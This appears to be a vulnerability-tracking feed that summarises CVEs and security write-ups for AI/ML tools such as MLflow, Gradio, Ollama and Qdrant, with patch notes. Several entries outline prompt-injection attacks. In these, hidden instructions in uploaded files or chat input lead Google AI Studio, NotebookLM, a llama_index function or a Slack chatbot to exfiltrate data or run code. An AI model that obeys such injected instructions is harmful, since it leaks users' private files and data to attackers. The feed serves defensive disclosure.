All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
CVE-2024-1594 is a path traversal vulnerability (a flaw that lets attackers access files outside their permitted directory) in MLflow's experiment creation feature. Attackers can exploit this by inserting a fragment component (#) into the artifact_location parameter to read arbitrary files on the server.
MLflow, a machine learning platform, has a path traversal vulnerability (a security flaw where attackers can access files outside intended directories) caused by improper handling of URL parameters. Attackers can use the semicolon (;) character to hide malicious path sequences in URLs, potentially gaining unauthorized access to sensitive files or compromising the server.
A path traversal vulnerability (a security flaw where attackers use special characters like ../ to access files outside their intended directory) exists in MLflow's artifact deletion feature. Attackers can delete arbitrary files on a server by exploiting an extra decoding step that fails to properly validate user input, and this vulnerability affects versions up to 2.9.2.
CVE-2024-1558 is a path traversal vulnerability (a security flaw where an attacker uses special characters like "../" to access files outside their intended directory) in MLflow's model version creation function. An attacker can craft a malicious `source` parameter that bypasses the validation check, allowing them to read any file on the server when fetching model artifacts.
HackSpaceCon 2024, held at Kennedy Space Center, featured a keynote by Dave Kennedy on making the world safer through security practices. Kennedy highlighted that attackers can easily modify existing malware (pre-written malicious code) to evade detection systems, and emphasized the importance of active threat hunting (proactively searching for signs of attacks rather than waiting for alerts).
Stable-diffusion-webui version 1.7.0 has a vulnerability where user input from the Backup/Restore tab is not properly validated before being used to create file paths, allowing attackers to write JSON files to arbitrary locations on Windows systems where the web server has access. This is a limited file write vulnerability (a security flaw that lets attackers create or modify files in unintended locations) that could let an attacker place malicious files on the server.
CVE-2023-51409 is a vulnerability in the Jordy Meow AI Engine: ChatGPT Chatbot plugin (versions up to 1.9.98) that allows unrestricted upload of dangerous file types, meaning attackers can upload files that shouldn't be allowed without proper validation. This vulnerability could potentially lead to remote code execution (running malicious commands on the affected system).
The huggingface/transformers library has a vulnerability where attackers can run arbitrary code on a victim's machine by tricking them into loading a malicious checkpoint file. The problem occurs in the `load_repo_checkpoint()` function, which uses `pickle.load()` (a Python function that reconstructs objects from serialized data) on data that might come from untrusted sources, allowing attackers to execute remote code execution (RCE, where an attacker runs commands on a system they don't own).
A vulnerability was found in the `safe_eval` function of the `llama_index` package that allows prompt injection (tricking an AI by hiding instructions in its input) to execute arbitrary code (running code an attacker chooses). The flaw exists because the input validation is insufficient, meaning the package doesn't properly check what data is being passed in, allowing attackers to bypass safety restrictions that were meant to prevent this type of attack.
The LearnPress WordPress LMS Plugin (learning management system plugin for WordPress) is vulnerable to stored cross-site scripting (XSS, where an attacker can inject harmful code into a webpage) in versions up to 4.2.6.3. Attackers with instructor-level access can inject malicious scripts into course, lesson, and quiz titles and content due to insufficient input sanitization (cleaning user input) and output escaping (converting special characters so they display as text rather than code), and these scripts will run whenever users visit the affected pages.
Ollama before version 0.1.29 has a DNS rebinding vulnerability (a technique where an attacker tricks a system into connecting to a malicious server by manipulating how domain names are translated into addresses), which allows unauthorized remote access to its full API. This vulnerability could let an attacker interact with the language model, remove models, or cause a denial of service (making a system unavailable by overloading it with requests).
GPT Academic is a tool that provides interactive interfaces for large language models. Versions 3.64 through 3.73 have a vulnerability where the server deserializes untrusted data (processes data from users without verifying it's safe), which could allow attackers to execute code remotely on any exposed server. Any device running these vulnerable versions and accessible over the internet is at risk.
Google AI Studio had a vulnerability that allowed attackers to steal data through prompt injection (tricking an AI by hiding malicious instructions in its input), where a malicious file could trick the AI into exfiltrating other uploaded files to an attacker's server via image tags. The vulnerability appeared in a recent update but was fixed within 12 days of being reported to Google on February 17, 2024.
Gradio, a popular Python library for building AI interfaces, has a vulnerability in its `/component_server` endpoint that lets attackers call any method on a Component class with their own arguments. By exploiting a specific method called `move_resource_to_block_cache()`, attackers can copy files from the server's filesystem to a temporary folder and download them, potentially exposing sensitive data like API keys, especially when apps are shared online or hosted on platforms like Hugging Face.
CVE-2024-1483 is a path traversal vulnerability (a weakness that lets attackers access files outside intended directories) in MLflow version 2.9.2 that allows attackers to read arbitrary files on a server. The vulnerability occurs because the server doesn't properly validate user input in the 'artifact_location' and 'source' parameters, and attackers can exploit this by sending specially crafted HTTP POST requests that use '#' instead of '?' in local URIs to navigate the server's directory structure.
CVE-2024-1183 is an SSRF vulnerability (a flaw where an attacker tricks a server into making requests to internal networks) in the Gradio application that lets attackers scan and identify open ports on internal networks by manipulating the 'file' parameter in requests and reading responses for specific headers or error messages.
Fix: A patch is available at https://github.com/gradio-app/gradio/commit/2ad3d9e7ec6c8eeea59774265b44f11df7394bb4
NVD/CVE DatabaseGoogle's NotebookLM is a tool that lets users upload files for an AI to analyze, but it's vulnerable to prompt injection (tricking the AI by hiding instructions in uploaded files) that can manipulate the AI's responses and expose what users see. The tool also has a data exfiltration vulnerability (attackers stealing information) when processing untrusted files, and there is currently no known way to prevent these attacks, meaning users cannot fully trust the AI's responses when working with files from unknown sources.
Qdrant (a vector database software) has a vulnerability in its snapshot upload endpoint that allows attackers to upload files to any location on the server's filesystem through path traversal (using special file path sequences to access directories they shouldn't). This could let attackers execute arbitrary code on the server and damage the system's integrity and availability.
Fix: A patch is available at https://github.com/qdrant/qdrant/commit/e6411907f0ecf3c2f8ba44ab704b9e4597d9705d
NVD/CVE DatabaseGradio (a framework for building AI interfaces) has a vulnerability in its UploadButton component where it doesn't properly validate (check) user input, allowing attackers to read any file on the server by manipulating file paths sent to the `/queue/join` endpoint. This could let attackers steal sensitive files like SSH keys (credentials used for secure server access) and potentially execute arbitrary code on the system.
Fix: The source indicates a fix exists in version 4.2.6.4, as referenced in the WordPress plugin changeset URL (https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042945%40learnpress%2Ftags%2F4.2.6.3&new=3061851%40learnpress%2Ftags%2F4.2.6.4), which compares the vulnerable 4.2.6.3 version to the patched 4.2.6.4 version. Users should update to version 4.2.6.4 or later.
NVD/CVE DatabaseFix: Update Ollama to version 0.1.29 or later.
NVD/CVE DatabaseFix: Upgrade to version 3.74, which contains a patch for the issue. The source states: 'There are no known workarounds aside from upgrading to a patched version.'
NVD/CVE DatabaseFix: The issue was fixed by Google and did not reproduce after the company heard back about the report 12 days later (by approximately February 29, 2024). The ticket was closed as 'Duplicate' on March 3, 2024, suggesting the vulnerability may have also been caught through internal testing.
Embrace The RedUnfurling is when an application automatically expands hyperlinks to show previews, which can be exploited in AI chatbots to leak data. When an attacker uses prompt injection (tricking an AI by hiding instructions in its input) to make the chatbot generate a link containing sensitive information from earlier conversations, the unfurling feature automatically sends that data to a third-party server, potentially exposing private information.
Fix: To disable unfurling in Slack Apps, modify the message creation function to include unfurl settings in the JSON object: set "unfurl_links": False and "unfurl_media": False when creating the message, as shown in the example code: def create_message(text): message = { "text": text, "unfurl_links": False, "unfurl_media": False } return json.dumps(message)
Embrace The Red